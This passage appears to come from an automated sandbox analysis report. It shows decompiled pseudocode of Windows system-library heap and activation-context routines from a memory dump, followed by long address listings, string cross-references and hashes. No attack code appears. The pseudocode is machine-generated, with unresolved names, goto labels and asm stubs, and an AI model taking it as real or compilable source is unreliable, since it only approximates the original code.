						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E6B1FAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E6B29A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E6B29A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x6b2c8748 - 1;
					if( *0x6b2c8748 >= 1) {
						_t131 = _t256 + 0x00000fff & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E6B1DB150();
							} else {
								E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E6B1DB150();
							__eflags =  *0x6b2c7bc8;
							if(__eflags == 0) {
								_t131 = E6B292073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                                                            0x6b1fa83a
                                                                                                                            0x6b1fa83c
                                                                                                                            0x6b1fa83e
                                                                                                                            0x6b1fa841
                                                                                                                            0x6b1fa844
                                                                                                                            0x6b1fa84a
                                                                                                                            0x6b1faa53
                                                                                                                            0x6b1faa59
                                                                                                                            0x6b1faa59
                                                                                                                            0x6b1fa858
                                                                                                                            0x6b1fa85e
                                                                                                                            0x6b1faaf5
                                                                                                                            0x6b1faafc
                                                                                                                            0x6b24229e
                                                                                                                            0x6b2422a2
                                                                                                                            0x6b2422a8
                                                                                                                            0x6b2422b3
                                                                                                                            0x6b2422b5
                                                                                                                            0x6b2422bb
                                                                                                                            0x6b2422c1
                                                                                                                            0x6b2422c5
                                                                                                                            0x6b2422e6
                                                                                                                            0x6b2422eb
                                                                                                                            0x6b2422f0
                                                                                                                            0x6b2422c7
                                                                                                                            0x6b2422dc
                                                                                                                            0x6b2422e1
                                                                                                                            0x6b2422e1
                                                                                                                            0x6b2422f3
                                                                                                                            0x6b2422f8
                                                                                                                            0x6b2422fd
                                                                                                                            0x6b242300
                                                                                                                            0x6b242307
                                                                                                                            0x6b24230e
                                                                                                                            0x6b24230e
                                                                                                                            0x6b242313
                                                                                                                            0x6b242313
                                                                                                                            0x6b2422b5
                                                                                                                            0x6b2422a2
                                                                                                                            0x6b1faafc
                                                                                                                            0x6b1fa864
                                                                                                                            0x6b1fa869
                                                                                                                            0x6b1faa5c
                                                                                                                            0x6b1faa5e
                                                                                                                            0x6b1fa86f
                                                                                                                            0x6b1fa87f
                                                                                                                            0x6b1fa885
                                                                                                                            0x6b1fa885
                                                                                                                            0x6b1fa88b
                                                                                                                            0x6b1fa890
                                                                                                                            0x6b1fa896
                                                                                                                            0x6b1fab0c
                                                                                                                            0x6b1fab0f
                                                                                                                            0x6b1fab15
                                                                                                                            0x6b242320
                                                                                                                            0x6b242320
                                                                                                                            0x6b1fab1b
                                                                                                                            0x6b1fa89c
                                                                                                                            0x6b1fa89f
                                                                                                                            0x6b1fa8a2
                                                                                                                            0x6b1fa8a2
                                                                                                                            0x6b1fa8a5
                                                                                                                            0x6b1fa8af
                                                                                                                            0x6b1fa8b3
                                                                                                                            0x6b1fa8b8
                                                                                                                            0x6b1faa66
                                                                                                                            0x6b1fa8be
                                                                                                                            0x6b1fa8c5
                                                                                                                            0x6b1fa8c6
                                                                                                                            0x6b1fa8ce
                                                                                                                            0x6b242328
                                                                                                                            0x6b242332
                                                                                                                            0x6b242337
                                                                                                                            0x6b242337
                                                                                                                            0x6b1fa8ce
                                                                                                                            0x6b1fa8d4
                                                                                                                            0x6b1fa8d8
                                                                                                                            0x6b1fa8db
                                                                                                                            0x6b1fa8de
                                                                                                                            0x6b1fa8e1
                                                                                                                            0x6b1fa8e5
                                                                                                                            0x6b1fa8e8
                                                                                                                            0x6b1fa8f0
                                                                                                                            0x6b1fa8f3
                                                                                                                            0x6b24234c
                                                                                                                            0x6b242350
                                                                                                                            0x6b242355
                                                                                                                            0x6b242359
                                                                                                                            0x6b242359
                                                                                                                            0x6b1fa8f9
                                                                                                                            0x6b1fa901
                                                                                                                            0x6b1faae4
                                                                                                                            0x6b1faae4
                                                                                                                            0x6b1faaea
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa907
                                                                                                                            0x6b1fa90a
                                                                                                                            0x6b1fa91d
                                                                                                                            0x6b1fa91d
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa910
                                                                                                                            0x6b1fa910
                                                                                                                            0x6b1fa910
                                                                                                                            0x6b1fa914
                                                                                                                            0x6b1fa924
                                                                                                                            0x6b1fa924
                                                                                                                            0x6b1fa924
                                                                                                                            0x6b1fa924
                                                                                                                            0x6b1fa916
                                                                                                                            0x6b1fa91b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa91b
                                                                                                                            0x6b1fa925
                                                                                                                            0x6b1fa925
                                                                                                                            0x6b1fa932
                                                                                                                            0x6b1fa936
                                                                                                                            0x6b1fa93c
                                                                                                                            0x6b1fa93c
                                                                                                                            0x6b1fa93c
                                                                                                                            0x6b1fab22
                                                                                                                            0x6b1fab24
                                                                                                                            0x6b1fab27
                                                                                                                            0x6b1fab27
                                                                                                                            0x6b1fa942
                                                                                                                            0x6b1fa944
                                                                                                                            0x6b1faaba
                                                                                                                            0x6b1faabd
                                                                                                                            0x6b1faac0
                                                                                                                            0x6b1faac0
                                                                                                                            0x6b1faac2
                                                                                                                            0x6b1fab2f
                                                                                                                            0x6b1faac4
                                                                                                                            0x6b1faac4
                                                                                                                            0x6b1faac7
                                                                                                                            0x6b1faaca
                                                                                                                            0x6b1faacc
                                                                                                                            0x6b1faace
                                                                                                                            0x6b1faace
                                                                                                                            0x6b1faace
                                                                                                                            0x6b1faad1
                                                                                                                            0x6b1faad1
                                                                                                                            0x6b1faad7
                                                                                                                            0x6b1faad9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b242361
                                                                                                                            0x6b242369
                                                                                                                            0x6b24236b
                                                                                                                            0x00000000
                                                                                                                            0x6b242371
                                                                                                                            0x00000000
                                                                                                                            0x6b242371
                                                                                                                            0x00000000
                                                                                                                            0x6b24236b
                                                                                                                            0x6b1faac0
                                                                                                                            0x6b1fa94a
                                                                                                                            0x6b1fa94a
                                                                                                                            0x6b1fa94d
                                                                                                                            0x6b1fa94d
                                                                                                                            0x6b1fa950
                                                                                                                            0x6b1fa954
                                                                                                                            0x6b242376
                                                                                                                            0x6b242380
                                                                                                                            0x6b1fa95a
                                                                                                                            0x6b1fa95a
                                                                                                                            0x6b1fa95c
                                                                                                                            0x6b1fa95f
                                                                                                                            0x6b1fa961
                                                                                                                            0x6b1fa961
                                                                                                                            0x6b1fa967
                                                                                                                            0x6b1fa96a
                                                                                                                            0x6b1fa972
                                                                                                                            0x6b1faa02
                                                                                                                            0x6b1faa06
                                                                                                                            0x6b1faa10
                                                                                                                            0x6b1faa16
                                                                                                                            0x6b1faa16
                                                                                                                            0x6b1faa1b
                                                                                                                            0x6b1faa21
                                                                                                                            0x6b1faa24
                                                                                                                            0x6b1faa27
                                                                                                                            0x6b1faa29
                                                                                                                            0x6b1faa2c
                                                                                                                            0x6b1faa32
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa978
                                                                                                                            0x6b1fa978
                                                                                                                            0x6b1fa97b
                                                                                                                            0x6b1fa981
                                                                                                                            0x6b1fa996
                                                                                                                            0x6b1fa998
                                                                                                                            0x6b1fa99f
                                                                                                                            0x6b1fa9a2
                                                                                                                            0x6b24238a
                                                                                                                            0x6b1fa9a8
                                                                                                                            0x6b1fa9a8
                                                                                                                            0x6b1fa9a8
                                                                                                                            0x6b1fa9aa
                                                                                                                            0x6b1fa9ad
                                                                                                                            0x6b1fa9b0
                                                                                                                            0x6b1fa9bb
                                                                                                                            0x6b1fa9be
                                                                                                                            0x6b1fa9c7
                                                                                                                            0x6b1fa9c9
                                                                                                                            0x6b1fa9c9
                                                                                                                            0x6b1fa9cc
                                                                                                                            0x6b1fa9d1
                                                                                                                            0x6b1faa6d
                                                                                                                            0x6b1faa70
                                                                                                                            0x6b1faa73
                                                                                                                            0x6b1faa75
                                                                                                                            0x6b1faa79
                                                                                                                            0x6b1faa7e
                                                                                                                            0x6b1faa82
                                                                                                                            0x6b1faa8f
                                                                                                                            0x6b1faa94
                                                                                                                            0x6b1faa96
                                                                                                                            0x6b242392
                                                                                                                            0x6b2423a1
                                                                                                                            0x6b2423a1
                                                                                                                            0x6b1faa9c
                                                                                                                            0x6b1faa9f
                                                                                                                            0x6b1faaa2
                                                                                                                            0x6b1faaa2
                                                                                                                            0x6b1faaa8
                                                                                                                            0x6b1faaab
                                                                                                                            0x6b1faaaf
                                                                                                                            0x00000000
                                                                                                                            0x6b1faab5
                                                                                                                            0x00000000
                                                                                                                            0x6b1faab5
                                                                                                                            0x6b1fa9d7
                                                                                                                            0x6b1fa9d7
                                                                                                                            0x6b1fa9da
                                                                                                                            0x6b1fa9e0
                                                                                                                            0x6b1fa9e3
                                                                                                                            0x6b1fa9e6
                                                                                                                            0x6b1fa9e9
                                                                                                                            0x6b1fa9eb
                                                                                                                            0x6b1fa9fd
                                                                                                                            0x6b1fa9fd
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa9eb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa983
                                                                                                                            0x6b1fa983
                                                                                                                            0x6b1fa983
                                                                                                                            0x6b1fa987
                                                                                                                            0x6b1fa995
                                                                                                                            0x6b1fa995
                                                                                                                            0x6b1fa995
                                                                                                                            0x6b1fa995
                                                                                                                            0x6b1fa989
                                                                                                                            0x6b1fa98e
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa990
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa990
                                                                                                                            0x6b1fa98e
                                                                                                                            0x00000000
                                                                                                                            0x6b1fa983
                                                                                                                            0x6b1fa972
                                                                                                                            0x6b1fa90a
                                                                                                                            0x6b1faa34
                                                                                                                            0x6b1faa34
                                                                                                                            0x6b1faa40
                                                                                                                            0x6b1faa43
                                                                                                                            0x6b1faa46
                                                                                                                            0x6b1faa4d
                                                                                                                            0x6b2423ab
                                                                                                                            0x6b2423b2
                                                                                                                            0x6b2423be
                                                                                                                            0x6b2423c3
                                                                                                                            0x6b2423c5
                                                                                                                            0x6b2423cb
                                                                                                                            0x6b2423d1
                                                                                                                            0x6b2423d5
                                                                                                                            0x6b2423f6
                                                                                                                            0x6b2423fb
                                                                                                                            0x6b2423d7
                                                                                                                            0x6b2423ec
                                                                                                                            0x6b2423f1
                                                                                                                            0x6b242403
                                                                                                                            0x6b242408
                                                                                                                            0x6b242410
                                                                                                                            0x6b242417
                                                                                                                            0x6b242422
                                                                                                                            0x6b242422
                                                                                                                            0x6b242417
                                                                                                                            0x6b2423c5
                                                                                                                            0x6b2423b2
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000018,?,?,?,?,?,?,?,?,?,6B1FA3D0,?,?,-00000018), ref: 6B2422DC
                                                                                                                            • DbgPrint.1105(((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)),?,?,?,?,?,?,?,?,6B1FA3D0,?,?,-00000018,?), ref: 6B2422F8
                                                                                                                            Strings
                                                                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 6B242403
                                                                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 6B2422F3
                                                                                                                            • HEAP: , xrefs: 6B2422E6, 6B2423F6
                                                                                                                            • HEAP[%wZ]: , xrefs: 6B2422D7, 6B2423E7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                            • API String ID: 3558298466-1657114761
                                                                                                                            • Opcode ID: 445ad91ff3f979bccee72513d125d1329aa7941cd54f571fe1d90a413b5c9ba4
                                                                                                                            • Instruction ID: 2e8e4f2bbdff19e35eb47adfbddb73fcdbb08a00682f946e63ef4bb30a4a3cf6
                                                                                                                            • Opcode Fuzzy Hash: 445ad91ff3f979bccee72513d125d1329aa7941cd54f571fe1d90a413b5c9ba4
                                                                                                                            • Instruction Fuzzy Hash: B6D1F370A24606AFDB08CF29C490BAAB7F5FF59300F1581A9D859DB745E33CE846CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20C707, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 251memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E6B20C707(signed char __ecx, void __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, void** _a16) {
				signed int _v8;
				char _v532;
				void* _v536;
				signed int _v540;
				void* _v544;
				short _v546;
				void* _v548;
				long _v552;
				signed int* _v556;
				signed int* _v560;
				void** _v564;
				void* _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t97;
				intOrPtr _t98;
				void _t105;
				signed int _t106;
				void** _t108;
				signed int _t109;
				void* _t114;
				void _t120;
				intOrPtr _t121;
				void* _t122;
				void* _t129;
				void* _t130;
				void* _t132;
				signed short _t140;
				void* _t143;
				void* _t148;
				int _t150;
				signed int _t155;

				_t142 = __edx;
				_v8 =  *0x6b2cd360 ^ _t155;
				_v556 = _a12;
				_t129 =  &_v532;
				_v560 = _a8;
				_t148 = 0;
				_v564 = _a16;
				_t143 = 0;
				_v540 = __ecx;
				_t132 = 0;
				_v532 = 0;
				_v548 = _v548 & 0;
				_v548 = 0;
				_t97 = 2;
				_v546 = _t97;
				_t98 = _a4;
				_v536 = 0;
				_v552 = 0;
				_v544 = _t129;
				if(_t98 == 0x6b1b127c) {
					E6B265720(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t149 = 0xc000000d;
					L21:
					return E6B21B640(_t149, _t129, _v8 ^ _t155, _t142, _t143, _t149);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t148 = 0;
				}
				if(_v556 != _t132) {
					 *_v556 =  *_v556 & _t132;
					_t148 = _t132;
				}
				if(_v564 != _t132) {
					 *_v564 =  *_v564 & _t143;
					_t132 = _t143;
				}
				if((_v540 & 0xfffffffc) != 0 || _t142 == 0 || _v560 == _t143 || _v556 == _t143) {
					_push(_v556);
					_push(_v560);
					_push(_t142);
					_push(_v540);
					E6B265720(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t149 = 0xc000000d;
					goto L19;
				} else {
					if(_t98 == 0) {
						L22:
						if(_t98 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
							L24:
							_t43 = _t142 + 0x200; // 0x230
							_t132 = _t43;
							_t105 =  *_t132;
							_t44 = _t142 + 0x204; // 0x234
							_t148 = _t44;
							_v536 = _t132;
							_v552 = _t148;
							if(_t105 == 0) {
								goto L33;
							}
							_t143 =  *((intOrPtr*)(_t105 + 0x18)) + _t105;
							goto L26;
						} else {
							if(_t98 != 0) {
								if((_v540 & 0x00000001) == 0) {
									L26:
									_t142 = 0;
									if( *_t132 == 0 ||  *_t148 != 0) {
										L33:
										_t106 =  *_t148;
										L16:
										_t142 = _v556;
										 *_v556 = _t106;
										 *_v560 =  *_t132;
										_t108 = _v564;
										if(_t108 != 0) {
											 *_t108 = _t143;
										}
										_t149 = 0;
										goto L19;
									} else {
										_t109 =  *(_t143 + 8);
										if(_t109 > 0x3ffffffc) {
											_t149 = 0xc0000095;
											L19:
											if(_t129 != 0 && _t129 !=  &_v532) {
												RtlFreeUnicodeString( &_v548);
											}
											goto L21;
										}
										_t130 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 0, 0xc + _t109 * 4);
										if(_t130 == 0) {
											_t149 = 0xc0000017;
											L51:
											_t129 = _v544;
											goto L19;
										}
										_t142 =  *(_t143 + 8);
										_t53 = _t130 + 0xc; // 0xc
										_t114 = E6B20D4B0(_t130,  *(_t143 + 8), _t53);
										_t149 = _t114;
										if(_t114 < 0) {
											RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t130);
											goto L51;
										}
										_t148 = _v552;
										asm("lock cmpxchg [esi], ecx");
										if(0 != 0) {
											E6B1D70C0(_t130);
											RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t130);
										}
										_t132 = _v536;
										_t129 = _v544;
										goto L33;
									}
								}
							}
							_t57 = _t142 + 0x1f8; // 0x228
							_t132 = _t57;
							_t120 =  *_t132;
							_t58 = _t142 + 0x1fc; // 0x22c
							_t148 = _t58;
							_v536 = _t132;
							_v552 = _t148;
							if(_t120 == 0) {
								goto L33;
							}
							_t143 =  *((intOrPtr*)(_t120 + 0x18)) + _t120;
							_v568 = _t143;
							if( *_t148 != 0) {
								goto L26;
							}
							_t121 =  *((intOrPtr*)(_t142 + 0x10));
							_t142 = 0x208;
							_t140 =  *(_t121 + 0x38);
							_t143 =  *(_t121 + 0x3c);
							_t150 = _t140 & 0x0000ffff;
							_v540 = _t140;
							_t67 = _t150 + 0xe; // 0x23a
							_t122 = _t67;
							if(_t122 > 0x208) {
								if(_t122 <= 0xfffe) {
									_t81 = _t140 + 0xe; // 0x6b1e6175
									_v546 = _t81;
									_t129 = E6B1F3A1C(_t81 & 0x0000ffff);
									_v544 = _t129;
									if(_t129 != 0) {
										L39:
										memcpy(_t129, _t143, _t150);
										_t132 = _v536;
										_v548 = _v540 + 0xc;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsw");
										_t143 = _v568;
										_t148 = _v552;
										goto L26;
									}
									_t149 = 0xc0000017;
									goto L21;
								}
								_t149 = 0xc0000106;
								goto L21;
							}
							_t129 =  &_v532;
							_v546 = 0x208;
							_v544 = _t129;
							goto L39;
						}
					}
					if(_t98 == 0xfffffffc) {
						goto L24;
					}
					if((_v540 & 0x00000003) != 0) {
						goto L22;
					}
					_t33 = _t98 + 0x10; // 0x10
					_t132 = _t33;
					_t142 =  *_t132;
					if(_t142 == 0) {
						_t149 = 0xc00000e5;
						goto L21;
					}
					_t143 =  *((intOrPtr*)(_t142 + 0x18)) + _t142;
					_t106 = _t98 + 0x5c;
					goto L16;
				}
			}




































                                                                                                                            0x6b20c707
                                                                                                                            0x6b20c719
                                                                                                                            0x6b20c720
                                                                                                                            0x6b20c726
                                                                                                                            0x6b20c730
                                                                                                                            0x6b20c736
                                                                                                                            0x6b20c73c
                                                                                                                            0x6b20c742
                                                                                                                            0x6b20c746
                                                                                                                            0x6b20c74c
                                                                                                                            0x6b20c74e
                                                                                                                            0x6b20c755
                                                                                                                            0x6b20c75b
                                                                                                                            0x6b20c764
                                                                                                                            0x6b20c765
                                                                                                                            0x6b20c76c
                                                                                                                            0x6b20c76f
                                                                                                                            0x6b20c775
                                                                                                                            0x6b20c77b
                                                                                                                            0x6b20c786
                                                                                                                            0x6b24a7ef
                                                                                                                            0x6b24a7f7
                                                                                                                            0x6b20c84b
                                                                                                                            0x6b20c85d
                                                                                                                            0x6b20c85d
                                                                                                                            0x6b20c792
                                                                                                                            0x6b20c79a
                                                                                                                            0x6b20c79c
                                                                                                                            0x6b20c79c
                                                                                                                            0x6b20c7a4
                                                                                                                            0x6b20c7ac
                                                                                                                            0x6b20c7ae
                                                                                                                            0x6b20c7ae
                                                                                                                            0x6b20c7b6
                                                                                                                            0x6b20c7be
                                                                                                                            0x6b20c7c0
                                                                                                                            0x6b20c7c0
                                                                                                                            0x6b20c7cc
                                                                                                                            0x6b24a8a6
                                                                                                                            0x6b24a8ac
                                                                                                                            0x6b24a8b2
                                                                                                                            0x6b24a8b3
                                                                                                                            0x6b24a8c7
                                                                                                                            0x6b24a8cf
                                                                                                                            0x00000000
                                                                                                                            0x6b20c7f2
                                                                                                                            0x6b20c7f4
                                                                                                                            0x6b20c860
                                                                                                                            0x6b20c863
                                                                                                                            0x6b20c872
                                                                                                                            0x6b20c872
                                                                                                                            0x6b20c872
                                                                                                                            0x6b20c878
                                                                                                                            0x6b20c87a
                                                                                                                            0x6b20c87a
                                                                                                                            0x6b20c880
                                                                                                                            0x6b20c886
                                                                                                                            0x6b20c88e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20c893
                                                                                                                            0x00000000
                                                                                                                            0x6b20c90f
                                                                                                                            0x6b20c911
                                                                                                                            0x6b24a812
                                                                                                                            0x6b20c895
                                                                                                                            0x6b20c895
                                                                                                                            0x6b20c899
                                                                                                                            0x6b20c908
                                                                                                                            0x6b20c908
                                                                                                                            0x6b20c819
                                                                                                                            0x6b20c819
                                                                                                                            0x6b20c81f
                                                                                                                            0x6b20c829
                                                                                                                            0x6b20c82b
                                                                                                                            0x6b20c833
                                                                                                                            0x6b20c835
                                                                                                                            0x6b20c835
                                                                                                                            0x6b20c837
                                                                                                                            0x00000000
                                                                                                                            0x6b20c89f
                                                                                                                            0x6b20c89f
                                                                                                                            0x6b20c8a7
                                                                                                                            0x6b24a85b
                                                                                                                            0x6b20c839
                                                                                                                            0x6b20c83b
                                                                                                                            0x6b24a8e0
                                                                                                                            0x6b24a8e0
                                                                                                                            0x00000000
                                                                                                                            0x6b20c83b
                                                                                                                            0x6b20c8c4
                                                                                                                            0x6b20c8c8
                                                                                                                            0x6b24a865
                                                                                                                            0x6b24a87e
                                                                                                                            0x6b24a87e
                                                                                                                            0x00000000
                                                                                                                            0x6b24a87e
                                                                                                                            0x6b20c8ce
                                                                                                                            0x6b20c8d1
                                                                                                                            0x6b20c8d7
                                                                                                                            0x6b20c8dc
                                                                                                                            0x6b20c8e0
                                                                                                                            0x6b24a879
                                                                                                                            0x00000000
                                                                                                                            0x6b24a879
                                                                                                                            0x6b20c8e6
                                                                                                                            0x6b20c8f0
                                                                                                                            0x6b20c8f6
                                                                                                                            0x6b24a88b
                                                                                                                            0x6b24a89c
                                                                                                                            0x6b24a89c
                                                                                                                            0x6b20c8fc
                                                                                                                            0x6b20c902
                                                                                                                            0x00000000
                                                                                                                            0x6b20c902
                                                                                                                            0x6b20c899
                                                                                                                            0x6b24a818
                                                                                                                            0x6b20c917
                                                                                                                            0x6b20c917
                                                                                                                            0x6b20c91d
                                                                                                                            0x6b20c91f
                                                                                                                            0x6b20c91f
                                                                                                                            0x6b20c925
                                                                                                                            0x6b20c92b
                                                                                                                            0x6b20c933
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20c938
                                                                                                                            0x6b20c93d
                                                                                                                            0x6b20c943
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20c949
                                                                                                                            0x6b20c94c
                                                                                                                            0x6b20c951
                                                                                                                            0x6b20c954
                                                                                                                            0x6b20c957
                                                                                                                            0x6b20c95a
                                                                                                                            0x6b20c960
                                                                                                                            0x6b20c960
                                                                                                                            0x6b20c965
                                                                                                                            0x6b24a822
                                                                                                                            0x6b24a82e
                                                                                                                            0x6b24a831
                                                                                                                            0x6b24a841
                                                                                                                            0x6b24a843
                                                                                                                            0x6b24a84b
                                                                                                                            0x6b20c97e
                                                                                                                            0x6b20c981
                                                                                                                            0x6b20c994
                                                                                                                            0x6b20c99a
                                                                                                                            0x6b20c9a9
